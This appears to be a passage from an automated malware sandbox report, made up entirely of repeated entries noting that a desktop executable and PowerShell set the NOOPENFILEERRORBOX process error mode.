                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
